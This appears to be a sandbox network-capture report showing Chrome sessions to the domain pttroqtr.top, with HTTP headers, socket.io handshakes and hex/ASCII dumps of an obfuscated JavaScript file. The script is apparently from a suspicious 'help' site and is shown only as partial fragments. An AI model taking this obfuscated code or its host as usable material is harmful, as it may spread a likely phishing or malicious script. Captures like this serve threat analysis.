                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            33192.168.2.5497528.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:29 UTC532OUTGET /help/assets/164f9b57JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:29 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:29 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 115111
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"1c1a7-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16020INData Raw: 76 61 72 20 61 32 5f 30 78 34 39 30 32 34 64 3d 61 32 5f 30 78 32 30 64 63 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 39 38 31 34 2c 5f 30 78 31 64 31 31 38 31 29 7b 76 61 72 20 5f 30 78 34 35 37 37 38 31 3d 61 32 5f 30 78 32 30 64 63 2c 5f 30 78 32 66 35 66 39 34 3d 5f 30 78 33 33 39 38 31 34 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 38 37 36 30 34 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 31 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 32 61 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 36 65 37 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 33 65 32 29 29
                                                                                                                                                                                            Data Ascii: var a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0x3e2))
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 26 44 65 6c 3b 27 3a 27 e2 88 87 27 2c 27 26 44 65 6c 74 61 3b 27 3a 27 ce 94 27 2c 27 26 44 66 72 3b 27 3a 27 f0 9d 94 87 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 41 63 75 74 65 3b 27 3a 27 c2 b4 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 74 3b 27 3a 27 cb 99 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 75 62 6c 65 41 63 75 74 65 3b 27 3a 27 cb 9d 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 47 72 61 76 65 3b 27 3a 27 60 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 54 69 6c 64 65 3b 27 3a 27 cb 9c 27 2c 27 26 44 69 61 6d 6f 6e 64 3b 27 3a 27 e2 8b 84 27 2c 27 26 44 69 66 66 65 72 65 6e 74 69 61 6c 44 3b 27 3a 27 e2 85 86 27 2c 27 26 44 6f 70 66 3b 27 3a 27 f0 9d 94 bb 27 2c 27 26 44 6f 74 3b 27 3a 27 c2 a8 27 2c 27 26 44 6f 74 44 6f 74
                                                                                                                                                                                            Data Ascii: &Del;':'','&Delta;':'','&Dfr;':'','&DiacriticalAcute;':'','&DiacriticalDot;':'','&DiacriticalDoubleAcute;':'','&DiacriticalGrave;':'`','&DiacriticalTilde;':'','&Diamond;':'','&DifferentialD;':'','&Dopf;':'','&Dot;':'','&DotDot
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 6f 77 3b 27 3a 27 e2 a4 90 27 2c 27 26 64 72 63 6f 72 6e 3b 27 3a 27 e2 8c 9f 27 2c 27 26 64 72 63 72 6f 70 3b 27 3a 27 e2 8c 8c 27 2c 27 26 64 73 63 72 3b 27 3a 27 f0 9d 92 b9 27 2c 27 26 64 73 63 79 3b 27 3a 27 d1 95 27 2c 27 26 64 73 6f 6c 3b 27 3a 27 e2 a7 b6 27 2c 27 26 64 73 74 72 6f 6b 3b 27 3a 27 c4 91 27 2c 27 26 64 74 64 6f 74 3b 27 3a 27 e2 8b b1 27 2c 27 26 64 74 72 69 3b 27 3a 27 e2 96 bf 27 2c 27 26 64 74 72 69 66 3b 27 3a 27 e2 96 be 27 2c 27 26 64 75 61 72 72 3b 27 3a 27 e2 87 b5 27 2c 27 26 64 75 68 61 72 3b 27 3a 27 e2 a5 af 27 2c 27 26 64 77 61 6e 67 6c 65 3b 27 3a 27 e2 a6 a6 27 2c 27 26 64 7a 63 79 3b 27 3a 27 d1 9f 27 2c 27 26 64 7a 69 67 72 61 72 72 3b 27 3a 27 e2 9f bf 27 2c 27 26 65 44 44 6f 74 3b 27 3a 27 e2 a9 b7 27 2c 27 26 65
                                                                                                                                                                                            Data Ascii: ow;':'','&drcorn;':'','&drcrop;':'','&dscr;':'','&dscy;':'','&dsol;':'','&dstrok;':'','&dtdot;':'','&dtri;':'','&dtrif;':'','&duarr;':'','&duhar;':'','&dwangle;':'','&dzcy;':'','&dzigrarr;':'','&eDDot;':'','&e
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: ab 81 27 2c 27 26 73 75 62 6e 45 3b 27 3a 27 e2 ab 8b 27 2c 27 26 73 75 62 6e 65 3b 27 3a 27 e2 8a 8a 27 2c 27 26 73 75 62 70 6c 75 73 3b 27 3a 27 e2 aa bf 27 2c 27 26 73 75 62 72 61 72 72 3b 27 3a 27 e2 a5 b9 27 2c 27 26 73 75 62 73 65 74 3b 27 3a 27 e2 8a 82 27 2c 27 26 73 75 62 73 65 74 65 71 3b 27 3a 27 e2 8a 86 27 2c 27 26 73 75 62 73 65 74 65 71 71 3b 27 3a 27 e2 ab 85 27 2c 27 26 73 75 62 73 65 74 6e 65 71 3b 27 3a 27 e2 8a 8a 27 2c 27 26 73 75 62 73 65 74 6e 65 71 71 3b 27 3a 27 e2 ab 8b 27 2c 27 26 73 75 62 73 69 6d 3b 27 3a 27 e2 ab 87 27 2c 27 26 73 75 62 73 75 62 3b 27 3a 27 e2 ab 95 27 2c 27 26 73 75 62 73 75 70 3b 27 3a 27 e2 ab 93 27 2c 27 26 73 75 63 63 3b 27 3a 27 e2 89 bb 27 2c 27 26 73 75 63 63 61 70 70 72 6f 78 3b 27 3a 27 e2 aa b8 27
                                                                                                                                                                                            Data Ascii: ','&subnE;':'','&subne;':'','&subplus;':'','&subrarr;':'','&subset;':'','&subseteq;':'','&subseteqq;':'','&subsetneq;':'','&subsetneqq;':'','&subsim;':'','&subsub;':'','&subsup;':'','&succ;':'','&succapprox;':''
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 2c 27 ce 98 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 36 61 29 2c 27 5c 75 32 30 35 66 5c 75 32 30 30 61 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 63 63 29 2b 27 65 3b 27 2c 27 5c 75 32 30 30 39 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 64 35 29 2c 27 e2 88 bc 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 32 39 29 2c 27 e2 89 83 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 64 37 29 2c 27 e2 89 85 27 3a 27 26 63 6f 6e 67 3b 27 2c 27 e2 89 88 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 33 66 29 2c 27 f0 9d 95 8b 27 3a 27 26 54 6f 70 66 3b 27 2c 27 e2 83 9b 27 3a 27 26 74 64 6f 74 3b 27 2c 27 f0 9d 92 af 27 3a 27 26 54 73 63 72 3b 27 2c 27 c5 a6 27 3a 27 26 54 73 74 72 6f 6b 3b 27 2c 27 c3 9a 27 3a 27 26 55 61 63
                                                                                                                                                                                            Data Ascii: ,'':a2_0x49024d(0x26a),'\u205f\u200a':a2_0x49024d(0x5cc)+'e;','\u2009':a2_0x49024d(0x5d5),'':a2_0x49024d(0x229),'':a2_0x49024d(0x5d7),'':'&cong;','':a2_0x49024d(0x33f),'':'&Topf;','':'&tdot;','':'&Tscr;','':'&Tstrok;','':'&Uac
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 78 34 30 30 29 2c 27 3e e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 66 36 29 2c 27 e2 a7 9e 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 62 66 29 2c 27 e2 a4 82 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 32 37 29 2c 27 e2 89 a4 e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 64 38 29 2c 27 3c e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 62 39 29 2c 27 e2 8a b4 e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 66 38 29 2c 27 e2 a4 83 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 39 32 29 2c 27 e2 8a b5 e2 83 92 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 34 64 65 29 2c 27 e2 88 bc e2 83 92 27 3a 27 26 6e 76 73 69 6d 3b 27 2c 27 e2 87 96 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30
                                                                                                                                                                                            Data Ascii: x400),'>':a2_0x49024d(0x3f6),'':a2_0x49024d(0x5bf),'':a2_0x49024d(0x327),'':a2_0x49024d(0x6d8),'<':a2_0x49024d(0x5b9),'':a2_0x49024d(0x6f8),'':a2_0x49024d(0x592),'':a2_0x49024d(0x4de),'':'&nvsim;','':a2_0x49024d(0
                                                                                                                                                                                            2024-09-28 03:39:29 UTC16384INData Raw: 27 26 66 72 61 63 32 33 3b 27 2c 27 26 74 68 69 6e 73 70 3b 27 2c 27 26 74 63 65 64 69 6c 3b 27 2c 27 26 73 69 6d 65 71 3b 27 2c 27 26 6f 6d 69 6e 75 73 3b 27 2c 27 69 61 6e 67 6c 65 42 61 72 3b 27 2c 27 26 62 65 70 73 69 3b 27 2c 27 26 76 63 79 3b 27 2c 27 26 61 6e 67 72 74 76 62 3b 27 2c 27 73 74 72 6f 6e 67 27 2c 27 26 64 74 72 69 66 3b 27 2c 27 26 6b 6f 70 66 3b 27 2c 27 63 74 6f 72 3b 27 2c 27 26 72 72 61 72 72 3b 27 2c 27 6f 77 6e 3b 27 2c 27 72 69 67 68 74 3b 27 2c 27 26 54 48 4f 52 4e 3b 27 2c 27 26 64 6f 75 62 6c 65 62 61 72 27 2c 27 69 6e 64 65 78 27 2c 27 26 69 6f 63 79 3b 27 2c 27 26 66 63 79 3b 27 2c 27 26 50 66 72 3b 27 2c 27 26 72 61 63 65 3b 27 2c 27 26 69 6d 61 67 70 61 72 74 3b 27 2c 27 26 6c 65 73 64 6f 74 6f 72 3b 27 2c 27 66 72 6f 6d
                                                                                                                                                                                            Data Ascii: '&frac23;','&thinsp;','&tcedil;','&simeq;','&ominus;','iangleBar;','&bepsi;','&vcy;','&angrtvb;','strong','&dtrif;','&kopf;','ctor;','&rrarr;','own;','right;','&THORN;','&doublebar','index','&iocy;','&fcy;','&Pfr;','&race;','&imagpart;','&lesdotor;','from
                                                                                                                                                                                            2024-09-28 03:39:29 UTC787INData Raw: 64 66 38 39 5b 27 61 63 74 69 6f 6e 73 27 5d 5b 5f 30 78 35 61 38 31 35 32 28 30 78 35 39 37 29 5d 3e 30 78 31 26 26 28 5f 30 78 34 32 64 66 38 39 5b 27 6c 6f 61 64 69 6e 67 27 5d 3d 21 30 78 30 29 3b 7d 29 2c 61 32 5f 30 78 31 39 61 31 31 33 28 28 29 3d 3e 5f 30 78 34 32 64 66 38 39 5b 27 6c 6f 61 64 69 6e 67 27 5d 2c 28 29 3d 3e 7b 76 61 72 20 5f 30 78 35 65 62 33 64 66 3d 5f 30 78 34 39 31 61 37 65 3b 63 6f 6e 73 74 20 5f 30 78 35 31 39 62 31 38 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 65 62 33 64 66 28 30 78 33 32 36 29 2b 5f 30 78 35 65 62 33 64 66 28 30 78 32 32 32 29 5d 28 27 2e 67 2d 6c 6f 61 64 69 6e 67 27 2b 5f 30 78 35 65 62 33 64 66 28 30 78 34 38 37 29 29 3b 5f 30 78 34 32 64 66 38 39 5b 5f 30 78 35 65 62 33 64 66 28 30 78 34 35 33 29 5d 3f
                                                                                                                                                                                            Data Ascii: df89['actions'][_0x5a8152(0x597)]>0x1&&(_0x42df89['loading']=!0x0);}),a2_0x19a113(()=>_0x42df89['loading'],()=>{var _0x5eb3df=_0x491a7e;const _0x519b18=document[_0x5eb3df(0x326)+_0x5eb3df(0x222)]('.g-loading'+_0x5eb3df(0x487));_0x42df89[_0x5eb3df(0x453)]?


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            34192.168.2.5497598.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjaQU HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 118
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:31 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 4c 79 33 6f 43 70 6c 30 74 4c 41 52 75 36 58 53 41 45 66 31 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                            Data Ascii: 0{"sid":"Ly3oCpl0tLARu6XSAEf1","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            35192.168.2.5497568.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: Upgrade
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Upgrade: websocket
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-WebSocket-Version: 13
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Sec-WebSocket-Key: whC+/smpod9BJ1y3VsqKpA==
                                                                                                                                                                                            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                            2024-09-28 03:39:31 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:31 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            36192.168.2.5497558.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC701OUTGET /help/frames/0/index.html HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            37192.168.2.5497588.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC364OUTGET /help/assets/164f9b57JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 115111
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"1c1a7-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16020INData Raw: 76 61 72 20 61 32 5f 30 78 34 39 30 32 34 64 3d 61 32 5f 30 78 32 30 64 63 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 39 38 31 34 2c 5f 30 78 31 64 31 31 38 31 29 7b 76 61 72 20 5f 30 78 34 35 37 37 38 31 3d 61 32 5f 30 78 32 30 64 63 2c 5f 30 78 32 66 35 66 39 34 3d 5f 30 78 33 33 39 38 31 34 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 38 37 36 30 34 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 31 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 32 61 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 36 65 37 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 33 65 32 29 29
                                                                                                                                                                                            Data Ascii: var a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0x3e2))
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16384INData Raw: 26 44 65 6c 3b 27 3a 27 e2 88 87 27 2c 27 26 44 65 6c 74 61 3b 27 3a 27 ce 94 27 2c 27 26 44 66 72 3b 27 3a 27 f0 9d 94 87 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 41 63 75 74 65 3b 27 3a 27 c2 b4 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 74 3b 27 3a 27 cb 99 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 44 6f 75 62 6c 65 41 63 75 74 65 3b 27 3a 27 cb 9d 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 47 72 61 76 65 3b 27 3a 27 60 27 2c 27 26 44 69 61 63 72 69 74 69 63 61 6c 54 69 6c 64 65 3b 27 3a 27 cb 9c 27 2c 27 26 44 69 61 6d 6f 6e 64 3b 27 3a 27 e2 8b 84 27 2c 27 26 44 69 66 66 65 72 65 6e 74 69 61 6c 44 3b 27 3a 27 e2 85 86 27 2c 27 26 44 6f 70 66 3b 27 3a 27 f0 9d 94 bb 27 2c 27 26 44 6f 74 3b 27 3a 27 c2 a8 27 2c 27 26 44 6f 74 44 6f 74
                                                                                                                                                                                            Data Ascii: &Del;':'','&Delta;':'','&Dfr;':'','&DiacriticalAcute;':'','&DiacriticalDot;':'','&DiacriticalDoubleAcute;':'','&DiacriticalGrave;':'`','&DiacriticalTilde;':'','&Diamond;':'','&DifferentialD;':'','&Dopf;':'','&Dot;':'','&DotDot
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 6f 77 3b 27 3a 27 e2 a4 90 27 2c 27 26 64 72 63 6f 72 6e 3b 27 3a 27 e2 8c 9f 27 2c 27 26 64 72 63 72 6f 70 3b 27 3a 27 e2 8c 8c 27 2c 27 26 64 73 63 72 3b 27 3a 27 f0 9d 92 b9 27 2c 27 26 64 73 63 79 3b 27 3a 27 d1 95 27 2c 27 26 64 73 6f 6c 3b 27 3a 27 e2 a7 b6 27 2c 27 26 64 73 74 72 6f 6b 3b 27 3a 27 c4 91 27 2c 27 26 64 74 64 6f 74 3b 27 3a 27 e2 8b b1 27 2c 27 26 64 74 72 69 3b 27 3a 27 e2 96 bf 27 2c 27 26 64 74 72 69 66 3b 27 3a 27 e2 96 be 27 2c 27 26 64 75 61 72 72 3b 27 3a 27 e2 87 b5 27 2c 27 26 64 75 68 61 72 3b 27 3a 27 e2 a5 af 27 2c 27 26 64 77 61 6e 67 6c 65 3b 27 3a 27 e2 a6 a6 27 2c 27 26 64 7a 63 79 3b 27 3a 27 d1 9f 27 2c 27 26 64 7a 69 67 72 61 72 72 3b 27 3a 27 e2 9f bf 27 2c 27 26 65 44 44 6f 74 3b 27 3a 27 e2 a9 b7 27 2c 27 26 65
                                                                                                                                                                                            Data Ascii: ow;':'','&drcorn;':'','&drcrop;':'','&dscr;':'','&dscy;':'','&dsol;':'','&dstrok;':'','&dtdot;':'','&dtri;':'','&dtrif;':'','&duarr;':'','&duhar;':'','&dwangle;':'','&dzcy;':'','&dzigrarr;':'','&eDDot;':'','&e
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: ab 81 27 2c 27 26 73 75 62 6e 45 3b 27 3a 27 e2 ab 8b 27 2c 27 26 73 75 62 6e 65 3b 27 3a 27 e2 8a 8a 27 2c 27 26 73 75 62 70 6c 75 73 3b 27 3a 27 e2 aa bf 27 2c 27 26 73 75 62 72 61 72 72 3b 27 3a 27 e2 a5 b9 27 2c 27 26 73 75 62 73 65 74 3b 27 3a 27 e2 8a 82 27 2c 27 26 73 75 62 73 65 74 65 71 3b 27 3a 27 e2 8a 86 27 2c 27 26 73 75 62 73 65 74 65 71 71 3b 27 3a 27 e2 ab 85 27 2c 27 26 73 75 62 73 65 74 6e 65 71 3b 27 3a 27 e2 8a 8a 27 2c 27 26 73 75 62 73 65 74 6e 65 71 71 3b 27 3a 27 e2 ab 8b 27 2c 27 26 73 75 62 73 69 6d 3b 27 3a 27 e2 ab 87 27 2c 27 26 73 75 62 73 75 62 3b 27 3a 27 e2 ab 95 27 2c 27 26 73 75 62 73 75 70 3b 27 3a 27 e2 ab 93 27 2c 27 26 73 75 63 63 3b 27 3a 27 e2 89 bb 27 2c 27 26 73 75 63 63 61 70 70 72 6f 78 3b 27 3a 27 e2 aa b8 27
                                                                                                                                                                                            Data Ascii: ','&subnE;':'','&subne;':'','&subplus;':'','&subrarr;':'','&subset;':'','&subseteq;':'','&subseteqq;':'','&subsetneq;':'','&subsetneqq;':'','&subsim;':'','&subsub;':'','&subsup;':'','&succ;':'','&succapprox;':''
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 2c 27 ce 98 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 36 61 29 2c 27 5c 75 32 30 35 66 5c 75 32 30 30 61 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 63 63 29 2b 27 65 3b 27 2c 27 5c 75 32 30 30 39 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 64 35 29 2c 27 e2 88 bc 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 32 39 29 2c 27 e2 89 83 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 64 37 29 2c 27 e2 89 85 27 3a 27 26 63 6f 6e 67 3b 27 2c 27 e2 89 88 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 33 66 29 2c 27 f0 9d 95 8b 27 3a 27 26 54 6f 70 66 3b 27 2c 27 e2 83 9b 27 3a 27 26 74 64 6f 74 3b 27 2c 27 f0 9d 92 af 27 3a 27 26 54 73 63 72 3b 27 2c 27 c5 a6 27 3a 27 26 54 73 74 72 6f 6b 3b 27 2c 27 c3 9a 27 3a 27 26 55 61 63
